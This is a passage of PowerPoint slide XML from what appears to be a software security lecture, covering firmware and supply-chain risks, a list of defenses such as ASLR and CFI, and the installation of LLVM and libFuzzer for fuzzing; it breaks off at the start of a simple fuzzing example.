                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Proprietary firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Boot loaders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>EFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Can all have vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How do you know?</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145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20802127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691" y="136524"/>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Some attacks are forever</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474133" y="2031999"/>
            <a:ext cx="11030007" cy="4506913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Some “platform” software is privileged, complex and opaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>BIOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Microcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Option ROM firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Errors or malware in these can make a platform insecure forever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Advanced Persistent Threats (APT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Configuration errors on BIOS update can be the path to infection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146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23183528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6251"/>
            <a:ext cx="12032268" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supply chain vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449869" y="1692911"/>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How much code do you write?  Review?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How do you know the code you download has not been modified during download? Shipment?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How do you know a developer did not introduce a subtle vulnerable vulnerability?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How about hardware (introduced malicious circuits)? substitute parts? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Microcode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>BIOS and pre-boot code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Option ROMs?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Transmitting devices?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147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5624257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48761"/>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8, attacking and hardening software </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619432" y="2058514"/>
            <a:ext cx="11112910" cy="407905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Hardware/software boundaries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Attacking software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Reverse engineering and attack methodologies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Modelling the adversary</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Defending software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Provenance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Redundancy and failure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Code and design review</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Formal Methods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Fuzzing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Red Teaming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148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12828855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2385"/>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Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482600" y="1667435"/>
            <a:ext cx="11226799" cy="4688916"/>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Audit tools: Coverity, Prefast/Prefix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Simulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Type safe languages (e.g.- Go)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>NX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Stack guards and canaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Address space layout randomization (ASLR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Control Flow Integrity (CFI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>DEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Anti-virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Behavioral analysis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149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32927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113983"/>
            <a:ext cx="11251026" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What’s an operating system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265471" y="1217123"/>
            <a:ext cx="6889526" cy="4626405"/>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An operating system is set of software programs including a “privileged” program called a “kernel” that manages computer hardware and the software running on the computer hardware.  Operating systems present “user level programs” with several critical abstractions that allow programmers to design and implement programs simply.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The “kernel abstractions” consist of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Processes and threads </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>I/O devices (character and block)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>File systems and storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Synchronization primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Basic services (like system time, inter-process and communication) as well as features for users to interact with kernel abstractions via a system call interface.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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="OS Structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA8087B-4B97-8345-9178-A42C34B6F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997" y="2110854"/>
            <a:ext cx="4771532" cy="317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1172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671" y="0"/>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Fuzzing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>libfuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> setup with llvm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864973" y="1797269"/>
            <a:ext cx="10923373" cy="4559082"/>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apt-add-repository "deb http://apt.llvm.org/xenial/ llvm-toolchain-xenial-6.0 main"</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update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 autoremove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clang-6.0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lld-6.0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llvm</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llvm-dev</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 install clang-6.0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 install clang-6.0++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libfuzzer-6.0-dev</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150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DDB0A4-3742-9F4F-852D-55150A1818E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206663" y="6137753"/>
            <a:ext cx="1653017" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From Google</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3318511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4549"/>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Simple libfuzz example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1548487"/>
            <a:ext cx="6917452" cy="4922967"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;stdint.h&gt;</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#include &lt;stdio.h&gt;</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#include &lt;stddef.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
